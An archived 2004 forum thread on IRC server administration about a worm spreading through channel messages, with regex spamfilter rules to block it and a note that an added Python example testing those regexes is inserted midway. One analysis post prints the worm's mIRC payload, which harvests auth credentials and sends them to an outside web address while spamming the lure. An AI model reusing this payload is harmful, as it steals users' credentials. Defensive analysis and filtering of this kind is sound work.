bloodhound.exploit.6 (symantec's name for it)

Posted: Mon May 10, 2004 10:45 pm
by nexus
this was seen spreading via channel msg's recently on the net I'm on:

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
infected users always send that exact text in a channel to new users that join

I wrote a simple spamfilter that works fine, but it probably could use some tweaking ;)

spamfilter {
	regex "^www\.fun-pix\.tk/blub_fish\.jpg <------- looooooooooool";
	target channel;
	reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
	action block;
};

Posted: Mon May 10, 2004 10:57 pm
by nexus
maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};

Posted: Tue May 11, 2004 3:47 pm
by Syzop
Thanks for the report, will take a look :).

Posted: Tue May 11, 2004 5:04 pm
by Syzop
Pretty harmless/simple/stupid thing, this is what it does:
It exploits some known IE vuln that X other trojans also use (don't care to look it up ;p)... and then a highly advanced visual basic exe gets started (*laugh*) which tries to use DDE to send the following stuff:

//write a.mrc on *:socklisten:x:sockaccept i | write a.mrc on *:sockread:i:sockread % $+ t $chr(124) tokenize 32 % $+ t $chr(124) if ($3 == :auth) url -an $!+(mitglied.lycos.de/z4p2k/a.php?d=,$encode($4,m),|,$encode($5,m)) | .load -rs a.mrc | socklisten x 6660 | server -m localhost 6660 | .timer -io 1 1 scon $!scon(0) window -h $+($chr(34),Status Window,$chr(34)) $chr(43) | .timer -io 1 1 scon $!scon(0) auth usepw q q  | .timer -io 1 1 scon $!scon(0) auth usepw 1 | scon -a .AMSG www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
What is interesting is that the exe file contains the following:

@*\AD:\Stefan\visual basic codes\code99\dde-mirc.vbp
and even:

CompanyName
Delta Konzept GmbH
(which you can find with google)

now this seems SOO stupid that it might be intentional (or part of it) ;).
Anyway.. still fun. *dinner*.

Posted: Thu Jun 10, 2004 8:50 am
by Dukat
nexus wrote: maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};
I think this regex is wrong (sorry for reposting in such an old thread).
But if I am right, the regex is wrong too in the CVS... :shock:

If the message is

www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
Then

^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$
would be the correct regex, wouldn't it?

Posted: Thu Jun 10, 2004 4:45 pm
by aquanight
Actually, an even better regex would be:

www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l
Differences being:
  • Removed BOL and EOL assertions, to account for variants that insert whitespace/color codes/other messages before or after the string.
  • Changed fixed length of the <- and lol portions to catch any length, since variants can easily modify these with more or less '-' or 'o' characters.
I can't imagine hitting false positives, when requiring a match against an exact URL (might want to account for variants here?).

Posted: Thu Jun 10, 2004 5:11 pm
by codemastr
There is a reason we try to use ^ and $ as much as possible. Yours can have false positives. And here is an example,

<User> Someone just messaged me with, "www.fun-pix.tk/blub_fish.jpg <------- looooooooooool" I think it is a virus, what should I do?

That would be blocked since it doesn't make sure that no other text is there.
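The three patterns from this thread can be checked side by side. The following is an added example, not code from the thread or from UnrealIRCd: it runs nexus's original regex, Dukat's corrected counts and aquanight's unanchored version against a message built to Dukat's count (7 dashes, 12 o's), against codemastr's "user quoting the line" case, and against a hypothetical variant with different run lengths. Python's re module stands in for the IRCd's regex engine (an assumption; quantifiers and anchors behave the same for these patterns), and all sample messages are constructed here.

```python
import re

# Constructed sample of the worm's channel message, built to Dukat's count
# (7 dashes, 12 o's) rather than copied, so the run lengths are unambiguous.
INFECTED_MSG = "www.fun-pix.tk/blub_fish.jpg <" + "-" * 7 + " l" + "o" * 12 + "l"

# Constructed from codemastr's false-positive scenario: an innocent user
# quoting the line while asking the channel for help.
QUOTING_MSG = (
    'Someone just messaged me with, "' + INFECTED_MSG
    + '" I think it is a virus, what should I do?'
)

# Hypothetical variant with other numbers of '-' and 'o' characters, the
# case aquanight's unanchored pattern is meant to catch.
VARIANT_MSG = "www.fun-pix.tk/blub_fish.jpg <" + "-" * 10 + " l" + "o" * 5 + "l"

SAMPLES = {
    "infected": INFECTED_MSG,
    "quoting": QUOTING_MSG,
    "variant": VARIANT_MSG,
}

# The three patterns exactly as posted in the thread.
PATTERNS = {
    "nexus": r"^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$",
    "dukat": r"^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$",
    "aquanight": r"www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l",
}


def would_block(pattern: str, message: str) -> bool:
    """Mimic a 'target channel' spamfilter check: an unanchored search over
    the message text, so only ^ and $ in the pattern restrict the position.
    Python's re is used as a stand-in for the IRCd's regex engine (assumption)."""
    return re.search(pattern, message) is not None


def evaluate(patterns=PATTERNS, samples=SAMPLES) -> dict:
    """Return {pattern_name: {sample_name: blocked?}} for every combination."""
    return {
        name: {sname: would_block(pat, msg) for sname, msg in samples.items()}
        for name, pat in patterns.items()
    }


if __name__ == "__main__":
    for name, results in evaluate().items():
        row = " ".join(f"{s}={'BLOCK' if b else 'pass'}" for s, b in results.items())
        print(f"{name:10s} {row}")
```

Running it shows the three trade-offs in one table: nexus's pattern matches nothing at all (6 dashes followed by a space never occurs in the real line, and $ rules out any other position), Dukat's blocks only the exact worm line, and aquanight's blocks the worm line and the variant but also the user asking for help.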

Posted: Thu Jun 10, 2004 5:22 pm
by aquanight
Hmm... yeah...

Then again, users would have no need to send messages of that kind if you block the original (the user would never receive it).

So maybe keep the ^ and $ :) . I was just trying to account for variants that could insert text at the beginning or end, but then if such a variant does occur, we can tweak the spamfilter to hit that as well, I guess ;) .

Posted: Sat Jun 12, 2004 7:48 am
by Dukat
Well, BOT, the Regex in the CVS is ATM just wrong and won't match. "Someone" should correct it... :D
Or should I write a bug report? :wink:

Posted: Sat Jun 12, 2004 2:57 pm
by Syzop
Yeah, seems you are right... Strange nobody noticed :(.

Anyway, the page is down now so it no longer matters :p.
(perhaps a good idea to do a cleanup once in a while)

About ^ and $.. I'm always a bit unsure... coz if a user pastes it like that, eg:
<User> <spreader> go to: http://www.virus.com/infectyou.html
<User> any idea what this is??
then the other user might click on it... and we end up with another infection.
So I can understand both points, neither one is perfect :P.
Anyway, another case: a virus spreading in msg.. then the user might paste it like that in a channel... which we didn't block at all... users are always a fun factor ;).
Basically I always just hope that this stuff is kept to a minimum, since we are presumed to block all the stuff in the first place so it never reaches the user... only thing left is cross-nets (or 'old events' / logs).. like: got a virus on dalnet, then ask on an unrealnet (where you are also connected to) what it is.
Blablabla :)